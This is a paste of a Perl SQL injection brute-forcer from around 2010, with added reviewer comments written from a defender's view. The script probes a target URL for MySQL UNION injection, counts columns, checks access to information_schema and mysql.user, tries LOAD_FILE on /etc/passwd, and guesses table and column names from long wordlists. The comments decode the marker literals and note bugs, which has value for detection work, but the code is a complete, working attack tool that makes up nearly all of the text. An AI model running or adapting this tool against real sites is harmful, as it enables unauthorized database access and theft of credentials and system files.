u0m3

sqli_brute.pl

Mar 3rd, 2012
#!/usr/bin/perl

# sqli_brute.pl -- a 2010-era MySQL UNION-based SQL injection probe.
#
# Reading notes (reviewer, defender's perspective):
#   * Every probe is a plain HTTP GET made through LWP::Simple::get(), with the
#     whole payload carried in the URL's query string, so each request lands in
#     the target's access log verbatim.
#   * Every probe except the LOAD_FILE one embeds the hex literal
#     0x6c6f67696e70776e7a, which is "loginpwnz", and then looks for the literal
#     string "loginpwnz" in the response body.  The LOAD_FILE probe embeds
#     0x2f6574632f706173737764 ("/etc/passwd", as the script itself writes to its
#     report) and looks for "root:x:".  Both literals are stable indicators of
#     this tool in web logs and WAF rules.
#   * Findings are appended to the file named in the third argument.
#   * There is no `use strict;` / `use warnings;`: every variable below is an
#     undeclared package global, so typos and undef values go unreported.

# Use the "Simple" module from "LWP" lib
# More info: http://search.cpan.org/~gaas/libwww-perl-6.04/lib/LWP.pm
use LWP::Simple;

# Usage check: argument 2 (the report file) is mandatory, so a missing third
# argument prints the banner and usage text and exits with status 0.
# Note that $ARGV[0] is the first user argument, not the script name ($0).
if(!$ARGV[2]) {
    print "\n\n[+] SQL Injection bruteforce By Bl4k3 -[+]-\n=========================================";
    print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";
    print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";
    exit (0);
}

# Candidate table names tried one by one when the -T option is present
# (see the -T branch below).  Entries are string literals, so the chomp()
# applied to them later is a no-op.  The list contains duplicates
# ('password', 'autores', 'membername'), each of which is simply probed twice.
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
    'name','names','nombre','nombres','usuarios','member','members','admin_table',
    'miembro','miembros','membername','admins','administrator',
    'administrators','passwd','password','passwords','pass','Pass',
    'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
    'member_password','mods','mod','moderators','moderator','user_email',
    'user_emails','user_mail','user_mails','mail','emails','email','address',
    'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
    'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
    'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
    'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
    'sistema_usuario','sistema_password','contrasena','auth','key','senha',
    'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
    'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
    'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
    'associated','accnt','customers','customer','membres','administrateur','utilisateur',
    'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
    'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
    'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

# Candidate column names tried one by one when the -C option is present
# (see the -C branch below).  Same remarks as for @nombretabla: literals,
# so chomp() is a no-op, and 'user_name' / 'usr' appear twice.
@nombrecolumna=('admin_name','log_utenti','cla_adm','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
    'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
    'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
    'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
    'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
    'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

# Prepend "http://" unless the URL already starts with "http:".  The pattern
# does not accept "https:", so an https:// URL ends up as "http://https://...".
if ( $ARGV[0] !~ /^http:/ ) {
    $ARGV[0] = "http://" . $ARGV[0];
}

# Pick the comment style used to pad and terminate every payload.
# $cmn is the token separator, $cfin the trailing comment.  The option may sit
# in any of argument positions 3..6; the right-hand side of =~ is a plain
# string, so it is compiled as a regex and matches anywhere inside the argument.
# $cmn / $cfin are never initialised: `.=` on an undef global starts from ''.
if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--") {
    $cmn.= "+";
    $cfin.="--";
    print "\n[+] Comments to use: '--' & '+'";
} else {
    $cmn.= "/**/";
    $cfin.= "/*";
    print "\n[+] Comments to use: '/*' & '/**/'";
}

# Open the report file (ARGV[2]) for appending.  This is a two-argument open on
# a bareword handle: the mode is fixed to ">>" by the concatenation, but the
# rest of the string is still interpreted by 2-arg open rather than taken as a
# literal filename.  WEB is never closed explicitly; buffered output is flushed
# at exit and write errors are never checked.
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";

# -NOCHECK (any of argument positions 3..6) skips the vulnerability check and
# records the site straight away.
if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK") {
    print "\n[!] Skipping the initial check...\n";
    print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
} else {
    print "\n[!] Checking if the website is vulnerable...\n";
    # Initial probe: "-1" + "union" + "select" with no column list, which is
    # deliberately malformed so that a verbose back end echoes a SQL error.
    $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;
    # LWP::Simple::get() returns undef for any non-success HTTP status, so a
    # 4xx/5xx answer (rather than a 200 page containing an error) aborts here.
    $response=get($sql)or die("[-] Wrong Website, check it\n");
    # Look for well-known database error strings in the response body.
    # Usually when SQL query fails, an error message apears on the webpage
    # and because it's easyer for programmers to just let the message apear to
    # end users instead of logging them and displaying a generic error message
    # we can use these SQL query error messages to deduce if the site is
    # susceptible to SQL injection or not
    # Reviewer note: several of these patterns are not what they look like --
    # see the trailing comments.  In particular the bare `/ /` alternative
    # matches any single space, so practically every HTML page satisfies this
    # condition and the "vulnerable" verdict below carries little information.
    if($response=~ /mysql_fetch_/ ||
    $response=~ /You have an error in your SQL syntax/ ||
    $response =~ /tem um erro de sintaxe no seu SQL/ ||
    $response =~ /mysql_num_rows/ ||
    $response =~ /Division by zero in/ ||
    $response =~ /SELECT * FROM/ ||   # `*` quantifies the preceding space: matches "SELECT FROM", not "SELECT * FROM"
    $response =~/ / ||   # matches any single space character -- true for almost any page
    $response =~ /Mysql Error/ ||
    $response =~ /Mysql Error./ ||   # `.` matches any char; subsumed by the previous alternative
    $response =~ /Incorrect syntax near/ ||
    $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ ||   # brackets are character classes here, not literal text
    $response =~ /Microsoft OLE DB Provider for SQL Server/) {
        print "[+] Vulnerable website, script continues...\n";
        print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
    } else {
        print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";
        exit(1);
    }
}

# Column-count search.  $ARGV[1] is used as a numeric upper bound without any
# validation.  On each pass $inyection gains one more marker literal and $union
# one more ",<index>"; for index 0 both are reset to '' so the first probe is a
# single-column select.  (Original author's remark: this is not my script and
# some of the logic choices are hard to follow; it could use improvements.)
print "\n[!] Looking up columns...\n";
for ($column = 0 ; $column < $ARGV[1] ; $column ++) {
    $union.=','.$column;
    $inyection.=','."0x6c6f67696e70776e7a";
    if ($column == 0) {
        print WEB "\n[COLUMNS]:\n\n";
        $inyection = '';
        $union = '';
    }
    # Probe with ($column + 1) marker columns; the marker "loginpwnz" shows up in
    # the body only when the UNION width matches the original query.
    $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
    $response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");
    if($response =~ /loginpwnz/) {
        # Convert the 0-based loop index into the reported column count.
        $column ++;
        print "[+] The site has $column columns\n\n";
        # Record the matching-width union with numeric placeholders "0,1,2,...".
        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
        print "$sql\n";
        print WEB "$sql\n";
        print "\n[!] Checking if Information_Schema exists...";
        # Same marker probe, now selecting FROM information_schema.tables.
        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
        $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
        if($response =~ /loginpwnz/) {
            print "\n[+] Information_Schema available...saving in $ARGV[2]";
            $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
            print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
        } else {
            print "\n[-] Information_Schema unavailable";
        }
        print "\n[!] Checking if MySQL.User exists...";
        # Same marker probe against mysql.user (readable only with elevated DB rights).
        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
        $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
        if($response =~ /loginpwnz/) {
            print "\n[+] MySQL.User available...saving in $ARGV[2]";
            $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
            print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
        } else {
            print "\n[-] MySQL.User unavailable";
        }
        # Build ($column - 1) extra load_file() terms so the select has the same
        # width as the union found above ($column already holds the real count).
        # $loadcont and $loadfile are undeclared globals starting from undef/''.
        while ($loadcont < $column-1) {
            $loadfile.=','.'load_file(0x2f6574632f706173737764)';
            $loadcont++;
        }
        print "\n[!] Checking if it is possible to inject LOAD_FILE...";
        # FILE-privilege probe: 0x2f6574632f706173737764 is "/etc/passwd"; a
        # "root:x:" string in the body means the file contents were echoed back.
        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
        $response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
        if($response =~ /root:x:/)
        {
            print "\n[+] LOAD_FILE available...saving in $ARGV[2]";
            print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
        } else {
            print "\n[-] LOAD_FILE unavailable";
        }
        # -T: one marker probe per candidate table name.  `=~ "-T"` matches the
        # substring anywhere in the argument, not the exact flag.
        if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T") {
            print "\n\n[!] Brute forcing tables...";
            print WEB "\n\n[TABLES]:\n\n";
            foreach $tabla(@nombretabla) {
                chomp($tabla);   # no-op: list entries carry no trailing newline
                # Marker probe selecting FROM the candidate table; any HTTP failure
                # (get() returning undef) aborts the whole run via die.
                $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
                $response=get($sql)or die("[-] Impossible to get tables\n");
                if($response =~ /loginpwnz/) {
                    print "\n[+] Table $tabla exists...saving in $ARGV[2]";
                    $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
                    print WEB "$sql\n";
                }
            }
        }
        # -C: one probe per candidate column name against a single table.
        # Reviewer note: the prompt below is printed but nothing is ever read
        # from STDIN, and `$tabla.=''` appends nothing.  $tabla is therefore
        # whatever it holds after the -T loop; since foreach restores a global
        # loop variable on exit, that is presumably empty -- confirm by running
        # with warnings.  The FROM clause is then built from that value.
        if ($ARGV[3] =~ "-C" ||
        $ARGV[4] =~ "-C" ||
        $ARGV[5] =~ "-C" ||
        $ARGV[6] =~ "-C") {
            print "\n\n[!] Table to brute force columns: ";
            $tabla.='';
            chomp($tabla);
            print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";
            foreach $columna(@nombrecolumna) {
                chomp($columna);   # no-op: list entries carry no trailing newline
                # concat(marker, 0x3a, <column>): 0x3a is ':'.  The response is
                # still only tested for the marker, so the column's value is not
                # parsed or recorded, only the column name.
                $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
                $response=get($sql)or die("[-] Impossible to get columns\n");
                if ($response =~ /loginpwnz/) {
                    print "\n[+] Column $columna available...saving in $ARGV[2]";
                    print WEB "$columna\n";
                }
            }
        }
        # Report trailer; exit status 0 ends the column loop on the first hit.
        print WEB "\n\n\n[*EOF*]";
        print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
        print "## c0ded by Bl4k3 | 2010 ##\n\n";
        exit (0);
    }
}
# Reached only when no width up to $ARGV[1] echoed the marker.  Note the exit
# status is 0 here as well, so callers cannot distinguish this from success.
print "[-] Impossible to find number of columns, try more columns\n\n";
print "## c0ded by Bl4k3 , WyattLW | 2010 ##\n\n";
exit (0);